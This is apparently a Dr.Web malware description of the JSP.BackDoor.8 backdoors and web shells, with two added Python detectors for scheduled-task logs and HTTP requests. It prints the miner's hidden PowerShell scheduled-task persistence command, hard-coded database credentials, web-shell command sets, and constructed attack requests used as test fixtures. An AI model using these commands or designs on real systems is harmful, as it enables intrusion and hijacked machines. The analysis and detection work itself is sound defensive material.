JSP.BackDoor.8

Added to the Dr.Web virus database: 2023-09-08

Virus description added:

SHA1: 0c6249feee3fef50fc0a5a06299c3e81681cc838

SHA1: 41d2247842151825aa8001a35ee339a0fef2813f

SHA1: 62ea0fce2716006d16a1408cda159cf20f90004e

SHA1: 33c11e7b2b3950a430cf3b40128429d9b723103c

Description

JSP.BackDoor.8 is a backdoor trojan that runs on Windows and Linux devices and executes shell commands sent by a remote host. It is packaged as a JAR file and is controlled through HTTP requests.

Operating routine

sha1:41d2247842151825aa8001a35ee339a0fef2813f

On startup, this sample checks its environment variables and then waits for a GET request whose "t" parameter is set to "cmd" and whose "c" parameter carries the command to execute. On Windows, the trojan runs

cmd /c <value>

otherwise, it executes

/bin/bash -c <value>

When the trojan receives a POST request, it loads additional functionality: the request body carries a base64-encoded plugin, which is decoded and loaded into the process memory.

sha1:0c6249feee3fef50fc0a5a06299c3e81681cc838

This JAR file is also controlled remotely over HTTP, but it handles only GET, POST and HEAD requests. The trojan reads the "go" parameter, which holds the IP address of the host to download the script from, and then checks the operating system. On Windows, it downloads a script named 1.ps1 and runs it under the following PowerShell setting:

Set-ExecutionPolicy Bypass -Scope Process -Force

On Linux, it downloads the ELF file kinsing (Linux.BtcMine.546) and runs it with the environment variable SKL=op exported.

The 1.ps1 script downloads the miner's components: sysupdate.exe (the miner itself), config.json and the update.ps1 script. If the miner is already installed on the system, the script stops and updates it. After downloading the files, it registers a scheduled task that runs update.ps1 in a hidden PowerShell window with the execution policy bypassed. The schedule is /SC MINUTE with /MO 30, that is, every 30 minutes, and /F overwrites any existing task of the same name while suppressing the warning. The command executed is:

SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\update.ps1" /MO 30 /F
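As an added example (not code from this page or from Dr.Web), the following Python analyzer takes a schtasks command line as it would appear in a process-creation log, reconstructs the effective run interval from /SC and /MO, and flags the traits of the persistence above: a PowerShell payload with the execution policy bypassed and a hidden window, a script under the user profile, a short interval, forced overwrite, and the task name used by this sample. The analyzed command line is the one quoted above; the benign comparison line and the indicator names are constructed for the example.

```python
import re

# Constructed sample: the scheduled-task command line quoted above, in the form it
# would have in a process-creation event (Sysmon Event ID 1 / Windows Security 4688).
SAMPLE_CMDLINE = (
    'SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" '
    '/TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden '
    '-File $HOME\\update.ps1" /MO 30 /F'
)

# Constructed benign task for comparison (assumed, not from the page).
BENIGN_CMDLINE = (
    'schtasks.exe /Create /SC DAILY /ST 02:00 /TN "Nightly Backup" '
    '/TR "C:\\Tools\\backup.exe /quiet"'
)

# Task name used by this sample, per the description above.
KNOWN_TASK_NAMES = {"update service for windows service"}

# Minutes per unit for schedule types whose /MO modifier is a plain count.
SCHEDULE_UNIT_MINUTES = {"MINUTE": 1, "HOURLY": 60, "DAILY": 1440, "WEEKLY": 10080}


def tokenize(cmdline):
    """Split a schtasks-style command line into arguments: a token is either a
    double-quoted string (quotes removed) or a run of non-whitespace."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks(cmdline):
    """Map /OPTION -> value; options that take no value (/Create, /F) map to True."""
    tokens = tokenize(cmdline)
    opts = {}
    i = 1  # tokens[0] is the executable
    while i < len(tokens):
        if tokens[i].startswith("/"):
            name = tokens[i][1:].upper()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[name] = tokens[i + 1]
                i += 1
            else:
                opts[name] = True
        i += 1
    return opts


def interval_minutes(opts):
    """Run interval implied by /SC and /MO; schtasks defaults /MO to 1."""
    unit = SCHEDULE_UNIT_MINUTES.get(str(opts.get("SC", "")).upper())
    if unit is None:
        return None
    try:
        return unit * int(opts.get("MO", 1))
    except (TypeError, ValueError):
        return None


def analyze(cmdline):
    """Return the task name, command, effective interval and a list of indicators."""
    opts = parse_schtasks(cmdline)
    task = str(opts.get("TN", ""))
    run = str(opts.get("TR", ""))
    low = run.lower()
    interval = interval_minutes(opts)
    indicators = []
    if "powershell" in low and re.search(r"-(?:executionpolicy|ep)\s+bypass", low):
        indicators.append("powershell_execution_policy_bypass")
    if re.search(r"-(?:windowstyle|w)\s+hidden", low):
        indicators.append("hidden_window")
    if "$home" in low or "%userprofile%" in low:  # script dropped in the user profile
        indicators.append("script_in_user_profile")
    if interval is not None and interval <= 60:
        indicators.append("high_frequency")
    if opts.get("F") is True:
        indicators.append("force_overwrite")
    if task.lower() in KNOWN_TASK_NAMES:
        indicators.append("known_task_name")
    return {"task_name": task, "run": run, "interval_minutes": interval,
            "indicators": indicators}


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(analyze(line))
```

Run it over the CommandLine field of Sysmon Event ID 1 or Security 4688 events. A task carrying the full set of indicators matches the chain described above; high_frequency on its own is also common for legitimate monitoring agents, so weight the PowerShell and task-name indicators higher than the interval alone.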

sha1:62ea0fce2716006d16a1408cda159cf20f90004e

This sample contains two JSP servlets, updata2_jsp and chakan_jsp. The former connects to the Openfire server's SQL database with a hard-coded connection string and credentials

jdbc:mysql[:]//localhost:3306/openfire root 123456

and reads name/value pairs from the query parameters name0 to name30 and value0 to value30. For each pair, the servlet updates the property named "name" in the "ofproperty" table, setting it to "value".

The second servlet, chakan_jsp, supports the following commands:

Name Description
cmd Executes a command via cmd.exe or /bin/bash, depending on the OS
copy Creates a page for copying a file
del Deletes a file; the file name is formed as path + / + file
down Displays the contents of a file on the screen; the file name is formed as path + / + file
edit Creates a page for editing a file
newFile Creates a file or a directory, using three query parameters:
    • fileName: name of the object
    • btnNewFile: if this field is not empty, a file is created
    • btnNewDir: if this field is not empty, a directory is created
save Writes the data from the "content" parameter to a file; the file name is formed as path + / + file
savecopy Copies the file path + file to the location given in the "file2" parameter. If "file2" is a directory, the new file name is formed as <dir>/cqq_<original file name>

sha1:33c11e7b2b3950a430cf3b40128429d9b723103c

The sample handles only GET, POST and HEAD requests. If a request carries no "action" parameter, "action" is set to "main"; otherwise it names the form to interact with. The web shell's main menu consists of the forms main, filesystem, command, database, config, about and exit, described below:

Filesystem

The command is passed to the backdoor in the “fsAction” parameter. If this parameter is empty, it is assigned the “list” value.

List of fsAction commands

Name Description
browse Outputs a list of files in the parent directory
copyto Moves a file from the source directory to the target directory. The value of the source directory is taken from the “deleteFile” parameter; the value of the destination directory is taken from the “dstPath” parameter
createFile Creates a file; the file name is taken from the “filename” parameter
createFolder Creates a folder; the file name is taken from the “folderName” parameter
deleteFile Deletes a file; the file name is taken from the “filesDelete” parameter
list Outputs a list of files in the directory whose name is passed as an argument
open Outputs the contents of the file
rename Renames a file; the old file name is taken from the “fileRename” parameter; the new name is taken from the “newName” parameter
save Saves an open file; the file content comes in the “fileContent” parameter
saveAs Saves the file; the file content comes in the “fileContent” parameter
upload Uploads a file; the file content comes in the body of the request

Command

Runs the command transmitted in the “command” parameter. The result is displayed on the screen.

Database

The command is transmitted in the "dbAction" parameter. If this parameter is empty, it is assigned the value "main" and the SQL query builder menu is displayed. When a query is submitted, "dbAction" is set to "dbContent".

The "dbConnect" method takes its connection data from the query parameters dbServer, dbPort, dbUsername, dbPassword and dbName. The query to run is taken from the "sql" parameter, and its result is displayed on the screen.

Config

The command is transmitted in the “cfAction” parameter. If this parameter is empty, it is assigned the value “main”.

List of cfAction commands

Name Description
main Displays the current password, encodeType, sessionTime and fileTypes settings
save Stores password, encode, sessionTime and textFileTypes; the values are taken from the parameters of the same names

About

This command outputs a blank page.

Exit

After this command is entered, the password will be removed from the session and the user is redirected to the main authorization page.
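The four samples above each expose a distinct HTTP parameter vocabulary: the "t"/"c" and "go" parameters and the base64 POST body of the two JAR backdoors, the nameN/valueN pairs and the path/file parameters of the updata2_jsp and chakan_jsp servlets, and the action/fsAction/dbAction/cfAction/command menu of the last web shell. The following Python request classifier is an added example (not code from this page or from Dr.Web) that turns those vocabularies into findings a defender can run over web-server or proxy logs. The sample requests, their paths and values are constructed for the example, and the base64 check on POST bodies only reports the leading bytes of the decoded blob, since the page does not say what format the plugin takes.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Parameter vocabularies taken from the description above.
MENU_ACTIONS = {"main", "filesystem", "command", "database", "config", "about", "exit"}
FS_ACTIONS = {"browse", "copyto", "createFile", "createFolder", "deleteFile", "list",
              "open", "rename", "save", "saveAs", "upload"}
CHAKAN_PARAMS = {"path", "file", "file2", "content", "fileName", "btnNewFile", "btnNewDir"}
PROPERTY_PARAM = re.compile(r"^(?:name|value)(\d+)$")

# Constructed sample requests as (method, request target, body); the paths and
# values are invented for this example.
SAMPLE_REQUESTS = [
    ("GET", "/admin/x.jsp?t=cmd&c=id", ""),
    ("POST", "/admin/x.jsp", base64.b64encode(b"\xca\xfe\xba\xbe" + b"\x00" * 12).decode()),
    ("GET", "/admin/y.jsp?go=203.0.113.10", ""),
    ("GET", "/updata2.jsp?name0=xmpp.domain&value0=attacker.example", ""),
    ("POST", "/chakan.jsp?path=%2Fopt%2Fopenfire%2Fconf&file=openfire.xml&content=x", ""),
    ("GET", "/s.jsp?action=filesystem&fsAction=deleteFile&filesDelete=%2Fetc%2Fcron.d%2Fx", ""),
    ("GET", "/s.jsp?action=command&command=uname+-a", ""),
    ("GET", "/index.jsp?page=1", ""),
]


def first_values(query):
    """Flatten parse_qs output to {name: first value}."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def decode_plugin_body(body):
    """Return the decoded bytes if the body looks like one base64 blob, else None.
    The page only says the plugin is base64-encoded; the decoded format is not
    matched here, its leading bytes are just reported."""
    compact = re.sub(r"\s+", "", body)
    if len(compact) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(method, target, body=""):
    """Return a list of (sample sha1 prefix, detail) findings for one request."""
    params = first_values(urlsplit(target).query)
    findings = []

    # sha1:41d2...: GET ?t=cmd&c=<command>; POST body carries a base64 plugin.
    if params.get("t") == "cmd" and "c" in params:
        findings.append(("41d22478", "shell command: " + params["c"]))
    if method.upper() == "POST":
        blob = decode_plugin_body(body)
        if blob is not None:
            findings.append(("41d22478", "base64 body, magic " + blob[:4].hex()))

    # sha1:0c6249...: ?go=<ip> names the host 1.ps1 or kinsing is fetched from.
    if "go" in params:
        findings.append(("0c6249fe", "stager download from " + params["go"]))

    # sha1:62ea0f...: updata2_jsp takes nameN/valueN, chakan_jsp path/file/...
    slots = sorted({m.group(1) for m in map(PROPERTY_PARAM.match, params) if m})
    if slots:
        findings.append(("62ea0fce", "ofproperty update, slots " + ",".join(slots)))
    if len(CHAKAN_PARAMS & set(params)) >= 2:
        target_file = params.get("path", "") + "/" + params.get("file", "")
        findings.append(("62ea0fce", "chakan_jsp file op on " + target_file))

    # sha1:33c11e...: action menu with fsAction/dbAction/cfAction/command sub-commands.
    menu_hit = params.get("action") in MENU_ACTIONS
    sub_hit = (params.get("fsAction") in FS_ACTIONS
               or "dbAction" in params or "cfAction" in params)
    if menu_hit or sub_hit:
        sub = next((f"{k}={params[k]}" for k in ("fsAction", "dbAction", "cfAction", "command")
                    if k in params), "")
        action = params.get("action", "main")  # the shell defaults a missing action to main
        findings.append(("33c11e7b", f"web shell action={action} {sub}".strip()))
    return findings


if __name__ == "__main__":
    for method, target, body in SAMPLE_REQUESTS:
        print(method, target, classify(method, target, body) or "-")
```

Feed it the method, request target and (where a proxy or WAF records it) the body of each logged request. The "command" parameter alone is deliberately not a trigger, since many legitimate applications use that name; the last web shell is reported only when "action" holds one of its menu names or a fsAction/dbAction/cfAction sub-command is present.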

Curing recommendations

Windows

  1. If the operating system can be booted (in normal or safe mode), download Dr.Web Security Space and run a full scan of your computer and of all removable media you use. Learn more about Dr.Web Security Space.
  2. If the operating system cannot be booted, change the BIOS settings of your computer so that it boots from CD/DVD or from a USB drive. Download the Dr.Web® LiveDisk system recovery disk image, or the utility for writing Dr.Web® LiveDisk to a USB drive, and prepare the corresponding media. Boot the computer from it, then run a full scan and cure the detected threats.

Mac OS

Run a full system scan using Dr.Web Antivirus for Mac OS.

Linux

Run a full scan of all disk partitions using Dr.Web Antivirus for Linux.

Android

  1. If your mobile device is working normally, download and install Dr.Web for Android on it. Run a full scan and follow the recommendations for neutralizing the detected threats.
  2. If the mobile device is locked by a trojan of the Android.Locker family (a message about a serious violation of the law or a ransom demand is displayed on the device's screen), proceed as follows:
    • boot your smartphone or tablet in safe mode (if you do not know how, consult the device documentation or contact the manufacturer);
    • then download and install Dr.Web for Android, run a full scan and follow the recommendations for neutralizing the detected threats;
    • disconnect your device and reconnect it.

Learn more about Dr.Web for Android